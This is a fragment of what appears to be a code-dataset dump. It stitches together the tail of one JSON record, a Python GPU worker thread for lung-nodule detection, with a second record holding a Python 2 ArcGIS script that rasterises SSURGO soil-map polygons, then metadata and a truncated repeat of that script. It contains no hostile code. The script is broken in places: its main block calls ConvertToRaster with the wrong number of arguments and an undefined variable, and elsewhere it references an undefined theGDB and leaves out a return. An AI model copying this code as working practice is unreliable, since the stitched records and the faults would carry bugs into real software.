"step-5": "import threading\nimport time\n\n# import numpy as np\nimport pickle\nfrom utils.ret_utils import error_info\nfrom nodule_class.isnodule import LungIsncls\nfrom preprocessing.location import lobe_locate_gmm\nfrom detection.lung_detection import LungDetection\nfrom func_timeout import FunctionTimedOut\nfrom func_timeout import func_set_timeout\nimport weakref\n\n\nclass GpuThread(threading.Thread):\n def __init__(self, que_det, que_ret, index):\n threading.Thread.__init__(self)\n self.que_det = que_det\n self.que_ret = que_ret\n\n self.index = index\n self.lung_dete = LungDetection(\"./model/det.ckpt\", self.index)\n # is nodule cls\n self.lung_isnc = LungIsncls(\"./model/isn.ckpt\", self.index)\n\n l_u = pickle._Unpickler(open(\"./model/left_gmm.pkl\", \"rb\"))\n l_u.encoding = \"latin1\"\n self.left_gmm = l_u.load()\n\n r_u = pickle._Unpickler(open(\"./model/right_gmm.pkl\", \"rb\"))\n r_u.encoding = \"latin1\"\n self.right_gmm = r_u.load()\n # cudnn.benchmark = True\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(\n time.ctime(),\n \" \",\n result_dict[\"json_id\"],\n \" Using GPU Device \",\n self.index,\n )\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(\n result_dict[\"prep_data\"],\n result_dict[\"prep_spac\"],\n result_dict[\"prep_ebox\"],\n result_dict[\"prep_mask\"],\n )\n print(\n time.ctime(),\n \" \",\n result_dict[\"json_id\"],\n \"GPU DOING USE TIME(lung dete prediction):\",\n time.time() - t_s,\n )\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(\n nodule_df, result_dict[\"prep_case\"], result_dict[\"prep_spac\"]\n )\n print(\n time.ctime(),\n \" \",\n result_dict[\"json_id\"],\n \"GPU DOING USE TIME(lung isnc nodule cls):\",\n time.time() - t_s,\n )\n # preb = lung_isnc.nodule_cls(nodule_df, result_dict['prep_case'], result_dict['prep_spac'])\n # del lung_isnc\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict[\"prep_mask\"])\n result_dict[\"nodule_preb\"] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(\n time.ctime(),\n \" \",\n result_dict[\"json_id\"],\n \"GPU DOING US TIME(lung lobe):\",\n time.time() - t_s,\n )\n i += 1\n del result_dict, nodule_df, preb\n\n except FunctionTimedOut:\n print(time.ctime(), result_dict[\"json_id\"], \"GPU FUN TIMEOUT \")\n except Exception as e:\n if result_dict and \"json_id\" in result_dict.keys():\n print(\n time.ctime()\n + \"GPU ERROR : {} {}\".format(e, result_dict[\"json_id\"])\n )\n error_info(200, result_dict)\n else:\n print(time.ctime() + \"GPU ERROR : {}\".format(e))\n\n @func_set_timeout(5)\n def lung_lobe(self, nodule_df, mask):\n nodule_df_values = nodule_df[[\"coordX\", \"coordY\", \"coordZ\"]].values\n lungs = []\n lobes = []\n\n lobel_info = []\n for nodule in nodule_df_values:\n lung, lobe = lobe_locate_gmm(nodule, mask, self.left_gmm, self.right_gmm)\n lungs.append(lung)\n lobes.append(lobe)\n lobel_info.append(lung + \"肺\" + (lobe + \"叶\" if not lobe == \"\" else \"\"))\n nodule_df[\"lung\"] = lungs\n nodule_df[\"lobe\"] = lobes\n\n nodule_df[\"lobel_info\"] = lobel_info\n return nodule_df\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# SSURGO_ExportMuRaster.py
#
# Convert MUPOLYGON featureclass to raster for the specified SSURGO geodatabase.
# By default any small NoData areas (< 5000 sq meters) will be filled using
# the Majority value.
#
# Input mupolygon featureclass must have a projected coordinate system or it will skip.
# Input databases and featureclasses must use naming convention established by the
# 'SDM Export By State' tool.
#
# For geographic regions that have USGS NLCD available, the tool wil automatically
# align the coordinate system and raster grid to match.
#
# 10-31-2013 Added gap fill method
#
# 11-05-2014
# 11-22-2013
# 12-10-2013 Problem with using non-unique cellvalues for raster. Going back to
# creating an integer version of MUKEY in the mapunit polygon layer.
# 12-13-2013 Occasionally see error messages related to temporary GRIDs (g_g*) created
# under "C:\Users\steve.peaslee\AppData\Local\Temp\a subfolder". These
# are probably caused by orphaned INFO tables.
# 01-08-2014 Added basic raster metadata (still need process steps)
# 01-12-2014 Restricted conversion to use only input MUPOLYGON featureclass having
# a projected coordinate system with linear units=Meter
# 01-31-2014 Added progressor bar to 'Saving MUKEY values..'. Seems to be a hangup at this
# point when processing CONUS geodatabase
# 02-14-2014 Changed FeatureToLayer (CELL_CENTER) to PolygonToRaster (MAXIMUM_COMBINED_AREA)
# and removed the Gap Fill option.
# 2014-09-27 Added ISO metadata import
#
# 2014-10-18 Noticed that failure to create raster seemed to be related to long
# file names or non-alphanumeric characters such as a dash in the name.
#
# 2014-10-29 Removed ORDER BY MUKEY sql clause because some computers were failing on that line.
# Don't understand why.
#
# 2014-10-31 Added error message if the MUKEY column is not populated in the MUPOLYGON featureclass
#
# 2014-11-04 Problems occur when the user's gp environment points to Default.gdb for the scratchWorkpace.
# Added a fatal error message when that occurs.
#
# 2015-01-15 Hopefully fixed some of the issues that caused the raster conversion to crash at the end.
# Cleaned up some of the current workspace settings and moved the renaming of the final raster.
#
# 2015-02-26 Adding option for tiling raster conversion by areasymbol and then mosaicing. Slower and takes
# more disk space, but gets the job done when otherwise PolygonToRaster fails on big datasets.
# 2015-02-27 Make bTiling variable an integer (0, 2, 5) that can be used to slice the areasymbol value. This will
# give the user an option to tile by state (2) or by survey area (5)
# 2015-03-10 Moved sequence of CheckInExtension. It was at the beginning which seems wrong.
#
# 2015-03-11 Switched tiled raster format from geodatabase raster to TIFF. This should allow the entire
# temporary folder to be deleted instead of deleting rasters one-at-a-time (slow).
# 2015-03-11 Added attribute index (mukey) to raster attribute table
# 2015-03-13 Modified output raster name by incorporating the geodatabase name (after '_' and before ".gdb")
#
# 2015-09-16 Temporarily renamed output raster using a shorter string
#
# 2015-09-16 Trying several things to address 9999 failure on CONUS. Created a couple of ArcInfo workspace in temp
# 2015-09-16 Compacting geodatabase before PolygonToRaster conversion
#
# 2015-09-18 Still having problems with CONUS raster even with ArcGIS 10.3. Even the tiled method failed once
# on AR105. Actually may have been the next survey, but random order so don't know which one for sure.
# Trying to reorder mosaic to match the spatial order of the polygon layers. Need to figure out if
# the 99999 error in PolygonToRaster is occurring with the same soil survey or same count or any
# other pattern.
#
# 2015-09-18 Need to remember to turn off all layers in ArcMap. Redraw is triggered after each tile.
#
# 2015-10-01 Found problem apparently caused by 10.3. SnapRaster functionality was failing with tiles because of
# MakeFeatureLayer where_clause. Perhaps due to cursor lock persistence? Rewrote entire function to
# use SAPOLYGON featureclass to define extents for tiles. This seems to be working better anyway.
#
# 2015-10-02 Need to look at some method for sorting the extents of each tile and sort them in a geographic fashion.
# A similar method was used in the Create gSSURGO database tools for the Append process.
#
# 2015-10-23 Jennifer and I finally figured out what was causing her PolygonToRaster 9999 errors.
# It was dashes in the output GDB path. Will add a check for bad characters in path.
#
# 2015-10-26 Changed up SnapToNLCD function to incorporate SnapRaster input as long as the coordinate
# system matches and the extent coordinates are integer (no floating point!).
#
# 2015-10-27 Looking at possible issue with batchmode processing of rasters. Jennifer had several
# errors when trying to run all states at once.
#
# 2015-11-03 Fixed failure when indexing non-geodatabase rasters such as .IMG.
## ===================================================================================
class MyError(Exception):
pass
## ===================================================================================
def PrintMsg(msg, severity=0):
# prints message to screen if run as a python script
# Adds tool message to the geoprocessor
#
#Split the message on \n first, so that if it's multiple lines, a GPMessage will be added for each line
try:
for string in msg.split('\n'):
#Add a geoprocessing message (in case this is run as a tool)
if severity == 0:
arcpy.AddMessage(string)
elif severity == 1:
arcpy.AddWarning(string)
elif severity == 2:
arcpy.AddMessage(" ")
arcpy.AddError(string)
except:
pass
## ===================================================================================
def errorMsg():
try:
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
theMsg = tbinfo + "\n" + str(sys.exc_type)+ ": " + str(sys.exc_value)
PrintMsg(theMsg, 2)
except:
PrintMsg("Unhandled error in errorMsg method", 2)
pass
## ===================================================================================
def WriteToLog(theMsg, theRptFile):
# prints message to screen if run as a python script
# Adds tool message to the geoprocessor
#print msg
#
try:
fh = open(theRptFile, "a")
theMsg = "\n" + theMsg
fh.write(theMsg)
fh.close()
except:
errorMsg()
pass
## ===================================================================================
def elapsedTime(start):
# Calculate amount of time since "start" and return time string
try:
# Stop timer
#
end = time.time()
# Calculate total elapsed seconds
eTotal = end - start
# day = 86400 seconds
# hour = 3600 seconds
# minute = 60 seconds
eMsg = ""
# calculate elapsed days
eDay1 = eTotal / 86400
eDay2 = math.modf(eDay1)
eDay = int(eDay2[1])
eDayR = eDay2[0]
if eDay > 1:
eMsg = eMsg + str(eDay) + " days "
elif eDay == 1:
eMsg = eMsg + str(eDay) + " day "
# Calculated elapsed hours
eHour1 = eDayR * 24
eHour2 = math.modf(eHour1)
eHour = int(eHour2[1])
eHourR = eHour2[0]
if eDay > 0 or eHour > 0:
if eHour > 1:
eMsg = eMsg + str(eHour) + " hours "
else:
eMsg = eMsg + str(eHour) + " hour "
# Calculate elapsed minutes
eMinute1 = eHourR * 60
eMinute2 = math.modf(eMinute1)
eMinute = int(eMinute2[1])
eMinuteR = eMinute2[0]
if eDay > 0 or eHour > 0 or eMinute > 0:
if eMinute > 1:
eMsg = eMsg + str(eMinute) + " minutes "
else:
eMsg = eMsg + str(eMinute) + " minute "
# Calculate elapsed secons
eSeconds = "%.1f" % (eMinuteR * 60)
if eSeconds == "1.00":
eMsg = eMsg + eSeconds + " second "
else:
eMsg = eMsg + eSeconds + " seconds "
return eMsg
except:
errorMsg()
return ""
## ===================================================================================
def Number_Format(num, places=0, bCommas=True):
try:
# Format a number according to locality and given places
#locale.setlocale(locale.LC_ALL, "")
if bCommas:
theNumber = locale.format("%.*f", (places, num), True)
else:
theNumber = locale.format("%.*f", (places, num), False)
return theNumber
except:
errorMsg()
return False
## ===================================================================================
def CheckStatistics(outputRaster):
# For no apparent reason, ArcGIS sometimes fails to build statistics. Might work one
# time and then the next time it may fail without any error message.
#
try:
#PrintMsg(" \n\tChecking raster statistics", 0)
for propType in ['MINIMUM', 'MAXIMUM', 'MEAN', 'STD']:
statVal = arcpy.GetRasterProperties_management (outputRaster, propType).getOutput(0)
#PrintMsg("\t\t" + propType + ": " + statVal, 1)
return True
except:
return False
## ===================================================================================
def UpdateMetadata(outputWS, target, surveyInfo, iRaster):
#
# Used for non-ISO metadata
#
# Search words: xxSTATExx, xxSURVEYSxx, xxTODAYxx, xxFYxx
#
try:
PrintMsg("\tUpdating metadata...")
arcpy.SetProgressor("default", "Updating metadata")
# Set metadata translator file
dInstall = arcpy.GetInstallInfo()
installPath = dInstall["InstallDir"]
prod = r"Metadata/Translator/ARCGIS2FGDC.xml"
mdTranslator = os.path.join(installPath, prod)
# Define input and output XML files
mdImport = os.path.join(env.scratchFolder, "xxImport.xml") # the metadata xml that will provide the updated info
xmlPath = os.path.dirname(sys.argv[0])
mdExport = os.path.join(xmlPath, "gSSURGO_MapunitRaster.xml") # original template metadata in script directory
# Cleanup output XML files from previous runs
if os.path.isfile(mdImport):
os.remove(mdImport)
# Get replacement value for the search words
#
stDict = StateNames()
st = os.path.basename(outputWS)[8:-4]
if st in stDict:
# Get state name from the geodatabase
mdState = stDict[st]
else:
# Leave state name blank. In the future it would be nice to include a tile name when appropriate
mdState = ""
# Set date strings for metadata, based upon today's date
#
d = datetime.date.today()
today = str(d.isoformat().replace("-",""))
# Set fiscal year according to the current month. If run during January thru September,
# set it to the current calendar year. Otherwise set it to the next calendar year.
#
if d.month > 9:
fy = "FY" + str(d.year + 1)
else:
fy = "FY" + str(d.year)
# Convert XML to tree format
tree = ET.parse(mdExport)
root = tree.getroot()
# new citeInfo has title.text, edition.text, serinfo/issue.text
citeInfo = root.findall('idinfo/citation/citeinfo/')
if not citeInfo is None:
# Process citation elements
# title, edition, issue
#
for child in citeInfo:
#PrintMsg("\t\t" + str(child.tag), 0)
if child.tag == "title":
if child.text.find('xxSTATExx') >= 0:
child.text = child.text.replace('xxSTATExx', mdState)
elif mdState != "":
child.text = child.text + " - " + mdState
elif child.tag == "edition":
if child.text == 'xxFYxx':
child.text = fy
elif child.tag == "serinfo":
for subchild in child.iter('issue'):
if subchild.text == "xxFYxx":
subchild.text = fy
# Update place keywords
ePlace = root.find('idinfo/keywords/place')
if not ePlace is None:
#PrintMsg("\t\tplace keywords", 0)
for child in ePlace.iter('placekey'):
if child.text == "xxSTATExx":
child.text = mdState
elif child.text == "xxSURVEYSxx":
child.text = surveyInfo
# Update credits
eIdInfo = root.find('idinfo')
if not eIdInfo is None:
#PrintMsg("\t\tcredits", 0)
for child in eIdInfo.iter('datacred'):
sCreds = child.text
if sCreds.find("xxSTATExx") >= 0:
#PrintMsg("\t\tcredits " + mdState, 0)
child.text = child.text.replace("xxSTATExx", mdState)
if sCreds.find("xxFYxx") >= 0:
#PrintMsg("\t\tcredits " + fy, 0)
child.text = child.text.replace("xxFYxx", fy)
if sCreds.find("xxTODAYxx") >= 0:
#PrintMsg("\t\tcredits " + today, 0)
child.text = child.text.replace("xxTODAYxx", today)
idPurpose = root.find('idinfo/descript/purpose')
if not idPurpose is None:
ip = idPurpose.text
if ip.find("xxFYxx") >= 0:
idPurpose.text = ip.replace("xxFYxx", fy)
#PrintMsg("\t\tpurpose", 0)
# create new xml file which will be imported, thereby updating the table's metadata
tree.write(mdImport, encoding="utf-8", xml_declaration=None, default_namespace=None, method="xml")
# import updated metadata to the geodatabase table
# Using three different methods with the same XML file works for ArcGIS 10.1
#
#PrintMsg("\t\tApplying metadata translators...")
arcpy.MetadataImporter_conversion (mdImport, target)
arcpy.ImportMetadata_conversion(mdImport, "FROM_FGDC", target, "DISABLED")
# delete the temporary xml metadata file
if os.path.isfile(mdImport):
os.remove(mdImport)
pass
# delete metadata tool logs
logFolder = os.path.dirname(env.scratchFolder)
logFile = os.path.basename(mdImport).split(".")[0] + "*"
currentWS = env.workspace
env.workspace = logFolder
logList = arcpy.ListFiles(logFile)
for lg in logList:
arcpy.Delete_management(lg)
env.workspace = currentWS
return True
except:
errorMsg()
False
## ===================================================================================
def CheckSpatialReference(muPolygon):
# Make sure that the coordinate system is projected and units are meters
try:
desc = arcpy.Describe(muPolygon)
inputSR = desc.spatialReference
if inputSR.type.upper() == "PROJECTED":
if inputSR.linearUnitName.upper() == "METER":
env.outputCoordinateSystem = inputSR
return True
else:
raise MyError, os.path.basename(theGDB) + ": Input soil polygon layer does not have a valid coordinate system for gSSURGO"
else:
raise MyError, os.path.basename(theGDB) + ": Input soil polygon layer must have a projected coordinate system"
except MyError, e:
# Example: raise MyError, "This is an error message"
PrintMsg(str(e), 2)
return False
except:
errorMsg()
return False
## ===================================================================================
def ConvertToRaster(muPolygon, rasterName):
# main function used for raster conversion
try:
#
# Set geoprocessing environment
#
env.overwriteOutput = True
arcpy.env.compression = "LZ77"
env.tileSize = "128 128"
gdb = os.path.dirname(muPolygon)
outputRaster = os.path.join(gdb, rasterName)
iRaster = 10 # output resolution is 10 meters
# Make sure that the env.scratchGDB is NOT Default.gdb. This causes problems for
# some unknown reason.
if (os.path.basename(env.scratchGDB).lower() == "default.gdb") or \
(os.path.basename(env.scratchWorkspace).lower() == "default.gdb") or \
(os.path.basename(env.scratchGDB).lower() == gdb):
raise MyError, "Invalid scratch workspace setting (" + env.scratchWorkspace + ")"
# Create an ArcInfo workspace under the scratchFolder. Trying to prevent
# 99999 errors for PolygonToRaster on very large databases
#
aiWorkspace = env.scratchFolder
if not arcpy.Exists(os.path.join(aiWorkspace, "info")):
#PrintMsg(" \nCreating ArcInfo workspace (" + os.path.basename(aiWorkspace) + ") in: " + os.path.dirname(aiWorkspace), 1)
arcpy.CreateArcInfoWorkspace_management(os.path.dirname(aiWorkspace), os.path.basename(aiWorkspace))
# turn off automatic Pyramid creation and Statistics calculation
env.rasterStatistics = "NONE"
env.pyramid = "PYRAMIDS 0"
env.workspace = gdb
# Need to check for dashes or spaces in folder names or leading numbers in database or raster names
desc = arcpy.Describe(muPolygon)
if not arcpy.Exists(muPolygon):
raise MyError, "Could not find input featureclass: " + muPolygon
# Check input layer's coordinate system to make sure horizontal units are meters
# set the output coordinate system for the raster (neccessary for PolygonToRaster)
if CheckSpatialReference(muPolygon) == False:
return False
# Sometimes it helps to compact large databases before raster conversion
#arcpy.SetProgressorLabel("Compacting database prior to rasterization...")
#arcpy.Compact_management(gdb)
# For rasters named using an attribute value, some attribute characters can result in
# 'illegal' names.
outputRaster = outputRaster.replace("-", "")
if arcpy.Exists(outputRaster):
arcpy.Delete_management(outputRaster)
time.sleep(1)
if arcpy.Exists(outputRaster):
err = "Output raster (" + os.path.basename(outputRaster) + ") already exists"
raise MyError, err
#start = time.time() # start clock to measure total processing time
#begin = time.time() # start clock to measure set up time
time.sleep(2)
PrintMsg(" \nBeginning raster conversion process", 0)
# Create Lookup table for storing MUKEY values and their integer counterparts
#
lu = os.path.join(env.scratchGDB, "Lookup")
if arcpy.Exists(lu):
arcpy.Delete_management(lu)
# The Lookup table contains both MUKEY and its integer counterpart (CELLVALUE).
# Using the joined lookup table creates a raster with CellValues that are the
# same as MUKEY (but integer). This will maintain correct MUKEY values
# during a moscaic or clip.
#
arcpy.CreateTable_management(os.path.dirname(lu), os.path.basename(lu))
arcpy.AddField_management(lu, "CELLVALUE", "LONG")
arcpy.AddField_management(lu, "mukey", "TEXT", "#", "#", "30")
# Create list of areasymbols present in the MUPOLYGON featureclass
# Having problems processing CONUS list of MUKEYs. Python seems to be running out of memory,
# but I don't see high usage in Windows Task Manager
#
# PrintMsg(" \nscratchFolder set to: " + env.scratchFolder, 1)
# Create list of MUKEY values from the MUPOLYGON featureclass
#
# Create a list of map unit keys present in the MUPOLYGON featureclass
#
PrintMsg("\tGetting list of mukeys from input soil polygon layer...", 0)
arcpy.SetProgressor("default", "Getting inventory of map units...")
tmpPolys = "SoilPolygons"
sqlClause = ("DISTINCT", None)
with arcpy.da.SearchCursor(muPolygon, ["mukey"], "", "", "", sql_clause=sqlClause) as srcCursor:
# Create a unique, sorted list of MUKEY values in the MUPOLYGON featureclass
mukeyList = [row[0] for row in srcCursor]
mukeyList.sort()
if len(mukeyList) == 0:
raise MyError, "Failed to get MUKEY values from " + muPolygon
muCnt = len(mukeyList)
# Load MUKEY values into Lookup table
#
#PrintMsg("\tSaving " + Number_Format(muCnt, 0, True) + " MUKEY values for " + Number_Format(polyCnt, 0, True) + " polygons" , 0)
arcpy.SetProgressorLabel("Creating lookup table...")
with arcpy.da.InsertCursor(lu, ("CELLVALUE", "mukey") ) as inCursor:
for mukey in mukeyList:
rec = mukey, mukey
inCursor.insertRow(rec)
# Add MUKEY attribute index to Lookup table
arcpy.AddIndex_management(lu, ["mukey"], "Indx_LU")
#
# End of Lookup table code
# Match NLCD raster (snapraster)
cdlRasters = arcpy.ListRasters("wsCDL*")
if len(cdlRasters) == 0:
raise MyError, "Required Cropland Data Layer rasters missing from " + gdb
else:
cdlRaster = cdlRasters[-1]
env.snapRaster = cdlRaster
#env.extent = cdlRaster
# Raster conversion process...
#
PrintMsg(" \nConverting featureclass " + os.path.basename(muPolygon) + " to raster (" + str(iRaster) + " meter)", 0)
tmpPolys = "poly_tmp"
arcpy.MakeFeatureLayer_management (muPolygon, tmpPolys)
arcpy.AddJoin_management (tmpPolys, "mukey", lu, "mukey", "KEEP_ALL")
arcpy.SetProgressor("default", "Running PolygonToRaster conversion...")
# Need to make sure that the join was successful
time.sleep(1)
rasterFields = arcpy.ListFields(tmpPolys)
rasterFieldNames = list()
for rFld in rasterFields:
rasterFieldNames.append(rFld.name.upper())
if not "LOOKUP.CELLVALUE" in rasterFieldNames:
raise MyError, "Join failed for Lookup table (CELLVALUE)"
if (os.path.basename(muPolygon).upper() + ".MUKEY") in rasterFieldNames:
#raise MyError, "Join failed for Lookup table (SPATIALVERSION)"
priorityFld = os.path.basename(muPolygon) + ".MUKEY"
else:
priorityFld = os.path.basename(muPolygon) + ".CELLVALUE"
#ListEnv()
arcpy.PolygonToRaster_conversion(tmpPolys, "Lookup.CELLVALUE", outputRaster, "MAXIMUM_COMBINED_AREA", "", iRaster) # No priority field for single raster
# immediately delete temporary polygon layer to free up memory for the rest of the process
time.sleep(1)
arcpy.Delete_management(tmpPolys)
# End of single raster process
# Now finish up the single temporary raster
#
PrintMsg(" \nFinalizing raster conversion process:", 0)
# Reset the stopwatch for the raster post-processing
#begin = time.time()
# Remove lookup table
if arcpy.Exists(lu):
arcpy.Delete_management(lu)
# ****************************************************
# Build pyramids and statistics
# ****************************************************
if arcpy.Exists(outputRaster):
time.sleep(1)
arcpy.SetProgressor("default", "Calculating raster statistics...")
PrintMsg("\tCalculating raster statistics...", 0)
env.pyramid = "PYRAMIDS -1 NEAREST"
arcpy.env.rasterStatistics = 'STATISTICS 100 100'
arcpy.CalculateStatistics_management (outputRaster, 1, 1, "", "OVERWRITE" )
if CheckStatistics(outputRaster) == False:
# For some reason the BuildPyramidsandStatistics command failed to build statistics for this raster.
#
# Try using CalculateStatistics while setting an AOI
PrintMsg("\tInitial attempt to create statistics failed, trying another method...", 0)
time.sleep(3)
if arcpy.Exists(os.path.join(gdb, "SAPOLYGON")):
# Try running CalculateStatistics with an AOI to limit the area that is processed
# if we have to use SAPOLYGON as an AOI, this will be REALLY slow
#arcpy.CalculateStatistics_management (outputRaster, 1, 1, "", "OVERWRITE", os.path.join(outputWS, "SAPOLYGON") )
arcpy.CalculateStatistics_management (outputRaster, 1, 1, "", "OVERWRITE" )
if CheckStatistics(outputRaster) == False:
time.sleep(3)
PrintMsg("\tFailed in both attempts to create statistics for raster layer", 1)
arcpy.SetProgressor("default", "Building pyramids...")
PrintMsg("\tBuilding pyramids...", 0)
arcpy.BuildPyramids_management(outputRaster, "-1", "NONE", "NEAREST", "DEFAULT", "", "SKIP_EXISTING")
# ****************************************************
# Add MUKEY to final raster
# ****************************************************
# Build attribute table for final output raster. Sometimes it fails to automatically build.
PrintMsg("\tBuilding raster attribute table and updating MUKEY values", )
arcpy.SetProgressor("default", "Building raster attrribute table...")
arcpy.BuildRasterAttributeTable_management(outputRaster)
# Add MUKEY values to final mapunit raster
#
arcpy.SetProgressor("default", "Adding MUKEY attribute to raster...")
arcpy.AddField_management(outputRaster, "MUKEY", "TEXT", "#", "#", "30")
with arcpy.da.UpdateCursor(outputRaster, ["VALUE", "MUKEY"]) as cur:
for rec in cur:
rec[1] = rec[0]
cur.updateRow(rec)
# Add attribute index (MUKEY) for raster
arcpy.AddIndex_management(outputRaster, ["mukey"], "Indx_RasterMukey")
else:
err = "Missing output raster (" + outputRaster + ")"
raise MyError, err
# Compare list of original mukeys with the list of raster mukeys
# Report discrepancies. These are usually thin polygons along survey boundaries,
# added to facilitate a line-join.
#
arcpy.SetProgressor("default", "Looking for missing map units...")
rCnt = int(arcpy.GetRasterProperties_management (outputRaster, "UNIQUEVALUECOUNT").getOutput(0))
if rCnt <> muCnt:
missingList = list()
rList = list()
# Create list of raster mukeys...
with arcpy.da.SearchCursor(outputRaster, ("MUKEY",)) as rcur:
for rec in rcur:
mukey = rec[0]
rList.append(mukey)
missingList = list(set(mukeyList) - set(rList))
queryList = list()
for mukey in missingList:
queryList.append("'" + mukey + "'")
if len(queryList) > 0:
PrintMsg("\tDiscrepancy in mapunit count for new raster", 1)
#PrintMsg("\t\tInput polygon mapunits: " + Number_Format(muCnt, 0, True), 0)
#PrintMsg("\t\tOutput raster mapunits: " + Number_Format(rCnt, 0, True), 0)
PrintMsg("The following MUKEY values were present in the original MUPOLYGON featureclass, ", 1)
PrintMsg("but not in the raster", 1)
PrintMsg("\t\tMUKEY IN (" + ", ".join(queryList) + ") \n ", 0)
# Update metadata file for the geodatabase
#
# Query the output SACATALOG table to get list of surveys that were exported to the gSSURGO
#
#saTbl = os.path.join(theGDB, "sacatalog")
#expList = list()
#with arcpy.da.SearchCursor(saTbl, ("AREASYMBOL", "SAVEREST")) as srcCursor:
# for rec in srcCursor:
# expList.append(rec[0] + " (" + str(rec[1]).split()[0] + ")")
#surveyInfo = ", ".join(expList)
surveyInfo = "" # could get this from SDA
#time.sleep(2)
arcpy.SetProgressorLabel("Updating metadata NOT...")
#bMetaData = UpdateMetadata(outputWS, outputRaster, surveyInfo, iRaster)
del outputRaster
del muPolygon
arcpy.CheckInExtension("Spatial")
return True
except MyError, e:
# Example: raise MyError, "This is an error message"
PrintMsg(str(e), 2)
arcpy.CheckInExtension("Spatial")
return False
except MemoryError:
raise MyError, "Not enough memory to process. Try running again with the 'Use tiles' option"
except:
errorMsg()
arcpy.CheckInExtension("Spatial")
return False
## ===================================================================================
## ===================================================================================
## MAIN
## ===================================================================================
# Import system modules
import sys, string, os, arcpy, locale, traceback, math, time, datetime, shutil
import xml.etree.cElementTree as ET
from arcpy import env
# Create the Geoprocessor object
try:
if __name__ == "__main__":
# get parameters
muPolygon = arcpy.GetParameterAsText(0) # required gSSURGO polygon layer
rasterName = arcpy.GetParameterAsText(1) # required name for output gdb raster
env.overwriteOutput= True
iRaster = 10
# Get Spatial Analyst extension
if arcpy.CheckExtension("Spatial") == "Available":
# try to find the name of the tile from the geodatabase name
# set the name of the output raster using the tilename and cell resolution
from arcpy.sa import *
arcpy.CheckOutExtension("Spatial")
else:
raise MyError, "Required Spatial Analyst extension is not available"
# Call function that does all of the work
bRaster = ConvertToRaster(muPolygon, theSnapRaster, iRaster)
arcpy.CheckInExtension("Spatial")
except MyError, e:
# Example: raise MyError, "This is an error message"
PrintMsg(str(e), 2)
except:
errorMsg()
|
normal
|
{
"blob_id": "d9a871fb6c889bcff455732007718af734859c72",
"index": 1325,
"step-1": "# SSURGO_ExportMuRaster.py\r\n#\r\n# Convert MUPOLYGON featureclass to raster for the specified SSURGO geodatabase.\r\n# By default any small NoData areas (< 5000 sq meters) will be filled using\r\n# the Majority value.\r\n#\r\n# Input mupolygon featureclass must have a projected coordinate system or it will skip.\r\n# Input databases and featureclasses must use naming convention established by the\r\n# 'SDM Export By State' tool.\r\n#\r\n# For geographic regions that have USGS NLCD available, the tool wil automatically\r\n# align the coordinate system and raster grid to match.\r\n#\r\n# 10-31-2013 Added gap fill method\r\n#\r\n# 11-05-2014\r\n# 11-22-2013\r\n# 12-10-2013 Problem with using non-unique cellvalues for raster. Going back to\r\n# creating an integer version of MUKEY in the mapunit polygon layer.\r\n# 12-13-2013 Occasionally see error messages related to temporary GRIDs (g_g*) created\r\n# under \"C:\\Users\\steve.peaslee\\AppData\\Local\\Temp\\a subfolder\". These\r\n# are probably caused by orphaned INFO tables.\r\n# 01-08-2014 Added basic raster metadata (still need process steps)\r\n# 01-12-2014 Restricted conversion to use only input MUPOLYGON featureclass having\r\n# a projected coordinate system with linear units=Meter\r\n# 01-31-2014 Added progressor bar to 'Saving MUKEY values..'. Seems to be a hangup at this\r\n# point when processing CONUS geodatabase\r\n# 02-14-2014 Changed FeatureToLayer (CELL_CENTER) to PolygonToRaster (MAXIMUM_COMBINED_AREA)\r\n# and removed the Gap Fill option.\r\n# 2014-09-27 Added ISO metadata import\r\n#\r\n# 2014-10-18 Noticed that failure to create raster seemed to be related to long\r\n# file names or non-alphanumeric characters such as a dash in the name.\r\n#\r\n# 2014-10-29 Removed ORDER BY MUKEY sql clause because some computers were failing on that line.\r\n# Don't understand why.\r\n#\r\n# 2014-10-31 Added error message if the MUKEY column is not populated in the MUPOLYGON featureclass\r\n#\r\n# 2014-11-04 Problems occur when the user's gp environment points to Default.gdb for the scratchWorkpace.\r\n# Added a fatal error message when that occurs.\r\n#\r\n# 2015-01-15 Hopefully fixed some of the issues that caused the raster conversion to crash at the end.\r\n# Cleaned up some of the current workspace settings and moved the renaming of the final raster.\r\n#\r\n# 2015-02-26 Adding option for tiling raster conversion by areasymbol and then mosaicing. Slower and takes\r\n# more disk space, but gets the job done when otherwise PolygonToRaster fails on big datasets.\r\n\r\n# 2015-02-27 Make bTiling variable an integer (0, 2, 5) that can be used to slice the areasymbol value. This will\r\n# give the user an option to tile by state (2) or by survey area (5)\r\n# 2015-03-10 Moved sequence of CheckInExtension. It was at the beginning which seems wrong.\r\n#\r\n# 2015-03-11 Switched tiled raster format from geodatabase raster to TIFF. This should allow the entire\r\n# temporary folder to be deleted instead of deleting rasters one-at-a-time (slow).\r\n# 2015-03-11 Added attribute index (mukey) to raster attribute table\r\n# 2015-03-13 Modified output raster name by incorporating the geodatabase name (after '_' and before \".gdb\")\r\n#\r\n# 2015-09-16 Temporarily renamed output raster using a shorter string\r\n#\r\n# 2015-09-16 Trying several things to address 9999 failure on CONUS. Created a couple of ArcInfo workspace in temp\r\n# 2015-09-16 Compacting geodatabase before PolygonToRaster conversion\r\n#\r\n# 2015-09-18 Still having problems with CONUS raster even with ArcGIS 10.3. Even the tiled method failed once\r\n# on AR105. Actually may have been the next survey, but random order so don't know which one for sure.\r\n# Trying to reorder mosaic to match the spatial order of the polygon layers. Need to figure out if\r\n# the 99999 error in PolygonToRaster is occurring with the same soil survey or same count or any\r\n# other pattern.\r\n#\r\n# 2015-09-18 Need to remember to turn off all layers in ArcMap. Redraw is triggered after each tile.\r\n#\r\n# 2015-10-01 Found problem apparently caused by 10.3. SnapRaster functionality was failing with tiles because of\r\n# MakeFeatureLayer where_clause. Perhaps due to cursor lock persistence? Rewrote entire function to\r\n# use SAPOLYGON featureclass to define extents for tiles. This seems to be working better anyway.\r\n#\r\n# 2015-10-02 Need to look at some method for sorting the extents of each tile and sort them in a geographic fashion.\r\n# A similar method was used in the Create gSSURGO database tools for the Append process.\r\n#\r\n# 2015-10-23 Jennifer and I finally figured out what was causing her PolygonToRaster 9999 errors.\r\n# It was dashes in the output GDB path. Will add a check for bad characters in 